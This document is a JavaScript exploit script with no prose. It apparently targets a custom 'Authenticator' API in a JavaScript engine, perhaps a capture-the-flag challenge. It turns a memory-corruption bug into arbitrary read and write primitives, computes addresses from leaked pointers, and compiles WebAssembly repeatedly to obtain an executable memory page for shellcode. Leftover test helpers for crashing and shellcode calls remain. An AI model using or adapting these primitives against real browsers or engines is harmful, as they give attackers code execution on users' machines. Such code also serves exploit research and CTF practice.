
function bigIntToBytes(bi) {
  var a = new Uint8Array(8);
  x=0;
  var cpy = bi;
  while(cpy>0) {
    a[x]=Number(cpy&255n);
    cpy>>=8n;
    x++
  }
  return a;
}

function parse(data) {
  return data.match(/saved_value = ([^\s]*)/)[1]
}

function readAt({addr, size}) {
  var view = new Uint8Array((Math.floor((size-1)/8)+1)*8);

  for (i=0; i<size; i+=8) {
    ad.setEndOfAuthenticode(BigInt(addr)+BigInt(i));
    var res = auth.Authenticate(ad);
    var out = parse(auth.get_authentication_data_info());
    var toBytes = bigIntToBytes(BigInt(out));
    for (j=i; j<i+8; j++) {
      view[j] = toBytes[j-i];
    }
  }
  return view;
}


var toWrite = [];
var curOffset = 0;

function writeAt({addr, content}) {
    console.log("WRITING AT")
    console.log(addr);
    console.log(content);
    toWrite.push({addr: BigInt(addr), content: BigInt(content)})
}

function flushWrites() {
    console.log("FLUSHING WRITES");
    var willRead = toWrite.length;
    var toFlush = toWrite.filter((e, idx) => idx >= curOffset && idx < willRead);
    curOffset = willRead;
    console.log("Will flush");
    console.log(toFlush);
    toFlush.map(({addr, content}) => write8AtNoJIT(addr, content));
}



var authpivotLeaked = null;
var authpivotLeakedKey = null;

function receivePivotLeaked(addr) {
    authpivotLeaked = addr;
    authpivotLeakedKey = ((addr & BigInt(0xffffffff)) + BigInt(0x100000000)) / BigInt(2)
}

function setHighBits({addr}) {
    console.log("SETTING HIGH BITS "+addr);
    receivePivotLeaked(BigInt(addr));
}



var leakToRealAddr;
var currentlyWriting = false;

function write8AtNoJIT(targetAddrBigInt, toWriteBigInt) {

    while (currentlyWriting) {
        try {} catch(e) {}
    }
    currentlyWriting = true;

    // prevent optimization ?? try it
    with({})
    try {} catch(e) {}
    eval('');

    var arrayToWrite = [targetAddrBigInt, toWriteBigInt, BigInt(0), BigInt(0x20) + BigInt(0x300000000)];
    var newab = new ArrayBuffer(32);
    var charbuf = new Uint8Array(newab);

    for (j=0; j<4; j++) {
        var toBytes = bigIntToBytes(arrayToWrite[j]);
        for (i=0; i<8; i++) {
            charbuf[j*8 + i] = toBytes[i];
        }
    }

    with({})
    try {} catch(e) {}
    eval('');

    var newad = new AuthenticationData(newab, BigInt(0x38), 3, BigInt("0xdeadbeef"));
    // attacking one (fake for the moment, we do not have leak (we want standalone OK))
    var newauth = new Authenticator(new DataView(newab));
    newad.setEndOfAuthenticode(BigInt(0x10)); // just not to crash but associate the buffer
    newauth.Authenticate(newad);
    // reference one to leak the buffer for current location, values does not matter
    var newauth2 = new Authenticator(new DataView(newab));
    newad.setEndOfAuthenticode(BigInt(0x38));
    var authres = newauth2.Authenticate(newad);  // the second one will not fail as below in memory

    var out = parse(newauth2.get_authentication_data_info());
    var toBigInt = BigInt(out);
    var highbits = BigInt("0xffffffff00000000") & authpivotLeaked;
    var leakToRealAddr = ((BigInt(2) * toBigInt) & BigInt(0xffffffff)) + highbits;
    var targetFinal = targetAddrBigInt - leakToRealAddr - BigInt(0x20 + 0x58*3 + 0x30);  // final 0x30 offset
    if (targetFinal < BigInt(0)) {
        targetFinal += BigInt("0x10000000000000000");
    }

    with({})
    try {} catch(e) {}
    eval('');

    var arrayToWrite2 = [targetFinal, toWriteBigInt,
                         BigInt(0), BigInt(0x20) + BigInt(0x300000000)];
    var newab2 = new ArrayBuffer(32);
    var charbuf2 = new Uint8Array(newab2);

    for (j=0; j<4; j++) {
        var toBytes = bigIntToBytes(arrayToWrite2[j]);
        for (i=0; i<8; i++) {
            charbuf2[j*8 + i] = toBytes[i];
        }
    }

    with({})
    try {} catch(e) {}
    eval('');

    // just fall 0x20 further for desync, plus 3x 0x58 for each block inbetween the leaked addr
    var newad2 = new AuthenticationData(newab2, BigInt(0x38), 3, toBigInt + BigInt(0x10 + (0x58*3/2)));
    var newauth3 = new Authenticator(new DataView(newab2));
    newauth3.Authenticate(newad2);

    currentlyWriting = false;
}


var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,43,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

for (let i = 0; i < 0x10000; i++) {
   f();
}

var buf = new ArrayBuffer(1000);
var dataview = new DataView(buf);


var ar1 = new Uint8Array(64);
ar1[50] = 0x67;
var ar2 = [0xddddeeaaaaaa, 0xddddeeaaaaab, 0xddddeeaaaaac, 0xddddeeaaaaad, ar1, buf, dataview, 0xddddeeaaaaaa, 0xddddeeaaaaaa, 0xddddeeaaaaab,0xddddeeaaaaab, 0xddddeeaaaaaa, 0xddddeeaaaaaa, 0xddddeeaaaaaa, f, 0x88776655];





// All functions below was for testing purpose and has not been cleaned yet

function buf2hex(buffer) {
  return [...new Uint8Array(buffer)]
      .map(x => x.toString(16).padStart(2, '0'))
      .join('');
}


function crash(write) {
    for (i=0; i<20; i++) {
        console.log(i);
        var d = new AuthenticationData(ab, BigInt(i*8), 3, BigInt("0x6565656463636261"));
        var auth = new Authenticator(new DataView(ab));
        var res = auth.Authenticate(d);
        console.log(auth.get_authentication_data_info());
    }
}

function doForBreakpoint() {
    return authref.Authenticate(adref);
}

function testObj(obj) {
    var oups = [obj, 0x133337, 0x2333337];
    oups[1] = authref.Authenticate(adref);
    oups[2] = authref.Authenticate(adref);
}

function callIndexOf() {
    ar2.indexOf(ar1);
    ar2.indexOf(shellcode);
    ar2.indexOf(f);
    ar2.indexOf(buf);
    ar2.indexOf(dataview);
    f();
    shellcode();
}

function trigger() {
    f();
}

function makeRWX() {

    for(j=0; j<0x100; j++) {
        var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,j,11]);
        var wasm_mod = new WebAssembly.Module(wasm_code);
        var wasm_instance = new WebAssembly.Instance(wasm_mod);
        var f = wasm_instance.exports.main;

        for (let i = 0; i < 0x10000; i++) {
           f();
        }
        console.log(f());
    }
}


function writeBetween(min, max) {
    var c = BigInt("8");
    var i = min;
    while (i<max) {
        console.log(i);
        write8At(i, BigInt("0xee7474743531"));
        i = i + c;
    }
}
